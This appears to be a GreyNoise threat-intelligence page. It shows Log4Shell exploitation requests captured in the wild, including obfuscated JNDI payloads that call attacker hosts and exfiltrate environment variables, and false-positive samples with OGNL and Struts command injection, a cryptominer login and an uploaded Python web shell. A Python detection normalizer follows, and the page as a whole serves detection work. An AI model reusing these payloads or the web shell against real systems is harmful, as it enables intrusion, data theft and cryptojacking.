Enclosed are some sanitized samples of data GreyNoise has identified and collected related to exploitation of the Log4J vulnerability in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified whether any of these are effective. These examples do not comprehensively cover all the payloads GreyNoise has observed.
These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.
The following section includes Log4Shell samples seen in the wild.
What appears to be a failed attempt:
GET /?id=%27%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F%27%2B+argv%5B2%5D+%2B%27%2Fass%7D%27 HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'
User-Agent: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'
Two obfuscation examples:
GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
GET /?q=${${lower:${lower:jndi}}:${lower:rmi}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Payload in a GET parameter as well as encoded into the authorization header:
GET /?x=$%7Bjndi:ldap://ec725b34.dns.1433.eu.org%7D HTTP/1.1
Host: <IP_ADDRESS>:631
user-agent: ${jndi:ldap://ec725b34.dns.1433.eu.org}
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
authorization: Basic JHtqbmRpOmxkYXA6Ly9lYzcyNWIzNC5kbnMuMTQzMy5ldS5vcmd9OiR7am5kaTpsZGFwOi8vZWM3MjViMzQuZG5zLjE0MzMuZXUub3JnfQ==
referer: ${jndi:ldap://ec725b34.dns.1433.eu.org}
Decoded base64:
${jndi:ldap://ec725b34.dns.1433.eu.org}:${jndi:ldap://ec725b34.dns.1433.eu.org}
Any method could appear; we simply wanted to provide an example of a method that was not GET or POST:
HEAD /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:8545
Connection: close
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
X-Forwarded-For: ${jndi:ldap://X-Forwarded-For.c6qtab5mk1u0ihtclet0cg47m7aeoyjro.interact.sh/x}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http664%7D HTTP/1.1
Host: <IP_ADDRESS>:664
User-Agent: ${jndi:dns://45.83.64.1/securityscan-http664}
Referer: ${jndi:dns://45.83.64.1/securityscan-http664}
X-Api-Version: ${jndi:dns://45.83.64.1/securityscan-http664}
Accept-Encoding: gzip
GET /$%7Bjndi:ldap://67.205.191.102:1389/jxjrbt%7D HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: ${jndi:rmi://67.205.191.102:1099/djf6hl}
GET /$%7Bjndi:iiop://128.90.61.199:10834/1639501300%7D HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Connection: TE, close
Referer: ${jndi:iiop://128.90.61.199:10834/1639501300}
Te: deflate,gzip;q=0.3
User-Agent: ${jndi:iiop://128.90.61.199:10834/1639501300}
X-Api-Version: ${jndi:iiop://128.90.61.199:10834/1639501300}
GET /$%7Bjndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b} HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Cache-Control: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
Connection: close
Cookie: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
User-Agent: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
X-Leakix: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
We noticed some of these going around that attempt to be a catch-all. Note the parameters and the POST body:
POST /global-protect/login.esp?v=%24%7Bjndi%3Armi%3A%2F%2F<IP_ADDRESS>.5f3gyn.dnslog.cn%7D HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: */*
Accept-Charset: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Datetime: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Encoding: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Language: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Cache-Control: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Connection: keep-alive
Content-Length: 298
Content-Type: application/json
Cookie: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Dnt: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Max-Forwards: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Origin: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Pragma: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Referer: https://${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Te: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
True-Client-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Upgrade: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
User-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Via: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Warning: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Api-Version: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Att-Deviceid: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Correlation-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrftoken: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Do-Not-Track: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo-Bar: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-By: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For-Original: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Host: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Port: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Protocol: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Scheme: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Server: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Ssl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarder-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Frame-Options: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Geoip-Country: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Destinationurl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Host-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Path-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Https: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Htx-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Hub-Signature: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-If-Unmodified-Since: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Imbo-Test-Config: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Insight: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip-Trail: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Proxyuser-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Request-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Requested-With: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Uidh: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Wap-Profile: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Xsrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
{"username": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "user": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "email": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "email_address": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "password": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"}
GreyNoise noticed a particular attacker evolve their techniques. There was initially basic exploitation via a header:
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:2375
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Waterfox/91.4.0
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://jobs3734.log.helicopter-crash.online:443/file}
This later evolved into the use of a parameter that completely obfuscates the payload and enables WAF bypass for most Log4J-related rules:
GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOnJtaTovLzQ1Ljc3LjEyNC42MTo0NDMvUkF9 HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36
Decoded base64:
${${::-j}ndi:rmi://45.77.124.61:443/RA}
We saw a variant of this where the payload was a bit more sophisticated in its use of bypasses:
GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOmxkYXA6Ly80NS43Ny4xMjQuNjE6NDQzLyMzZDJmMjc3MjczNzQ3ODVmZGVlMjkyYjI0Nzg2MjFkZF86O18ke2VudjpQQVRIfV86O18ke2VudjpVU0VSfV86O18ke2VudjpVU0VSTkFNRX1fOjtfJHtlbnY6SE9TVE5BTUV9Xzo7XyR7ZW52OlVTRVJETlNET01BSU59Xzo7XyR7ZW52OkNPTVBVVEVSTkFNRX1fOjtfJHtidW5kbGU6YXBwbGljYXRpb246c3ByaW5nLmRhdGFzb3VyY2UudXJsfV86O18ke3N5czpqYXZhLnZlcnNpb259fQ== HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Decoded base64:
${${::-j}ndi:ldap://45.77.124.61:443/#3d2f27727374785fdee292b2478621dd_:;_${env:PATH}_:;_${env:USER}_:;_${env:USERNAME}_:;_${env:HOSTNAME}_:;_${env:USERDNSDOMAIN}_:;_${env:COMPUTERNAME}_:;_${bundle:application:spring.datasource.url}_:;_${sys:java.version}}
This section provides samples of some false positives that may appear with overly broad matching patterns.
Variations on OGNL exploits show up fairly often because they also target Java and share many similar fingerprinting bypasses:
GET /%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context['com.opensymphony.xwork2.ActionContext.container']).(%23ognlUtil%3d%23container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3d'ping%208z8usjxsanw60xuueazmq5e1isoic7.burpcollaborator.net%20-c1').(%23iswin%3d(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3d(%23iswin%3f%7b'cmd.exe'%2c'/c'%2c%23cmd%7d%3a%7b'/bin/bash'%2c'-c'%2c%23cmd%7d)).(%23p%3dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3d%23p.start()).(@org.apache.commons.io.IOUtils@toString(%23process.getInputStream()))%7d/portal/js/html5shiv.min.js HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
This false positive can potentially be avoided by looking for jsonrpc:
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42m9nqbb2aL9TTYHUeBrz8VactZAbtMBzdTjdoofR5XNGRa9H1Mcxenat3vZazj9s9bLJq31ugJFKKWYSLKznsQHCLgEJfo","pass":"x","agent":"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
I don't know what to say about this...
POST /logupload?logMetaData={""a"":{""@type"":""com.alibaba.fastjson.JSONObject"",{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao5""}}""""},""b"":{{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao6""}:""x""},""c"":{{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao7""}:0,""d"":Set[{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao8""}],""e"":Set[{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao9""},} HTTP/1.1
Host: <IP_ADDRESS>:8443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 4411
Content-Type: multipart/form-data; boundary=7ddcdf06c9de6031e144846ebacf8cde
User-Agent: python-requests/2.25.1
--7ddcdf06c9de6031e144846ebacf8cde
Content-Disposition: form-data; name=""logfile""; filename=""upload.txt""
#! /usr/bin/env python3
import cgi
import os,sys,subprocess
import logging
import json
WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = ""workload_log_{}.zip""
class LogFileJson:
"""""" Defines format to upload log file in harness
Arguments:
itrLogPath : log path provided by harness to store log data
logFileType : Type of log file defined in api.agentlogFileType
workloadID [OPTIONAL] : workload id, if log file is workload specific
""""""
def __init__(self, itrLogPath, logFileType, workloadID = None):
self.itrLogPath = itrLogPath
self.logFileType = logFileType
self.workloadID = workloadID
def to_json(self):
return json.dumps(self.__dict__)
@classmethod
def from_json(cls, json_str):
json_dict = json.loads(json_str)
return cls(**json_dict)
class agentlogFileType():
"""""" Defines various log file types to be uploaded by agent
""""""
WORKLOAD_ZIP_LOG = ""workloadLogsZipFile""
try:
# TO DO: Puth path in some config
logging.basicConfig(filename=""/etc/httpd/html/logs/uploader.log"",filemode='a', level=logging.ERROR)
except:
# In case write permission is not available in log folder.
pass
logger = logging.getLogger('log_upload_wsgi.py')
def application(environ, start_response):
logger.debug(""application called"")
if environ['REQUEST_METHOD'] == 'POST':
post = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
keep_blank_values=True
)
# TO DO: Puth path in some config or read from config is already available
resultBasePath = ""/etc/httpd/html/vpresults""
try:
filedata = post[""logfile""]
metaData = post[""logMetaData""]
if metaData.value:
logFileJson = LogFileJson.from_json(metaData.value)
if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))
if filedata.file:
if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
else:
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
with open(filePath, 'wb') as output_file:
while True:
data = filedata.file.read(1024)
# End of file
if not data:
break
output_file.write(data)
body = u"" File uploaded successfully.""
start_response(
'200 OK',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
except Exception as e:
logger.error(""Exception {}"".format(str(e)))
body = u""Exception {}"".format(str(e))
else:
if environ['REQUEST_METHOD'] == 'GET':
post = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
keep_blank_values=True
)
if post[""key""].value == ""hell0W0rld"":
command = post[""baby""].value
proc = subprocess.run(command, shell=True,stdout=subprocess.PIPE)
body = proc.stdout.decode(""utf-8"")
start_response(
'200 OK',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
logger.error(""Invalid request"")
body = u""Invalid request""
start_response(
'400 fail',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
--7ddcdf06c9de6031e144846ebacf8cde--
GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
Host: <HOST>
Connection: close
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
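
Added example, not GreyNoise's code: a normalizer that undoes the encodings seen in the Log4Shell samples above (URL-encoding, base64 parameter values, nested ${::-x} and ${lower:x} lookups) before looking for a jndi lookup, so the obfuscated requests match while the OGNL false positive does not. The SAMPLES names, the shortened OGNL line and the collector.example host are constructed for illustration; handling of the general ${name:-default} form goes beyond the ${::-j} variant shown on this page.

```python
import base64
import re
from urllib.parse import unquote

OPEN, CLOSE = "\x01", "\x02"   # stand-ins for "${" and "}" of lookups already visited
_INNER = re.compile(r"\$\{([^{}]*)\}")            # an innermost ${...} (no braces inside)
_B64 = re.compile(r"[A-Za-z0-9+/_-]{16,}={0,2}")  # base64-looking token, std or URL-safe

def normalize(value):  # collapse nested lookups innermost-first; return jndi lookups found
    hits = []
    def resolve(m):
        body = m.group(1)
        prefix, _, arg = body.partition(":")
        if prefix.lower() in ("lower", "upper"):   # ${lower:jndi} -> jndi
            return arg
        if prefix.lower() == "jndi":               # record it with inner lookups restored
            hits.append("${" + body.replace(OPEN, "${").replace(CLOSE, "}") + "}")
        elif ":-" in body:                         # ${::-j} -> j (default-value syntax)
            return body.split(":-", 1)[1]
        return OPEN + body + CLOSE                 # keep it, but never match it again
    prev = None
    while prev != value:                           # repeat until nothing changes
        prev, value = value, _INNER.sub(resolve, value)
    return hits

def candidates(text):  # raw text, URL-decoded text, and each base64-looking token decoded
    decoded = unquote(text)
    yield from (text, decoded)
    for tok in _B64.findall(decoded):
        tok = tok.rstrip("=")
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), altchars=b"-_")
        except ValueError:                         # impossible length: not base64
            continue
        yield raw.decode("utf-8", "ignore")

def scan(request_text):  # distinct normalized ${jndi:...} lookups in one request
    found = []
    for cand in candidates(request_text):
        for hit in normalize(cand):
            if hit not in found:
                found.append(hit)
    return found

# Request lines copied from this page's samples; "ognl" is shortened, "nested" is constructed.
SAMPLES = {
    "char_default": "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://5.255.97.172:1389/a} HTTP/1.1",
    "lower": "GET /?q=${${lower:${lower:jndi}}:${lower:rmi}://5.255.97.172:1389/a} HTTP/1.1",
    "urlencoded": "GET /?x=$%7Bjndi:ldap://ec725b34.dns.1433.eu.org%7D HTTP/1.1",
    "base64_param": "GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId="
                    "JHskezo6LWp9bmRpOnJtaTovLzQ1Ljc3LjEyNC42MTo0NDMvUkF9 HTTP/1.1",
    "ognl": "GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=false}.action HTTP/1.1",
    "nested": "X-Api-Version: ${jndi:ldap://collector.example/${env:USER}}",
}
RESULTS = {name: scan(line) for name, line in SAMPLES.items()}  # sample name -> lookups found
```

Matching on the normalized form rather than on a bare ${ is what keeps the OGNL request out of the results; any environment or system lookups nested inside a hit are kept so an analyst can see what the request tried to read.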